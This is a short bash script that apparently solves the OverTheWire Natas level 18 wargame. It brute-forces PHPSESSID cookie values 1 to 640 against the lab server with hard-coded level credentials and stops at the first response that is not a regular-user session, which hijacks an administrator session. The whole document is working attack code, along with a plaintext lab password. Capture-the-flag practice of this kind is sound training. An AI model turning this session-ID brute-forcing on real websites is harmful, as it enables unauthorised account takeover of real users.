#!/bin/bash

for i in `seq 1 640`;
do
    res1=$( curl -s -u natas18:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP http://natas18.natas.labs.overthewire.org/ --cookie PHPSESSID=$i)
    res2=$(echo $res1|grep 'You are logged in as a regular user' )
    # Echo the result of the curl if
    # 'you are logged in as a regular user' is not in it, ie $res2 is empty string
    if [ -z "$res2" ];
    then
        echo $res1
        break
    fi
    echo $i
done
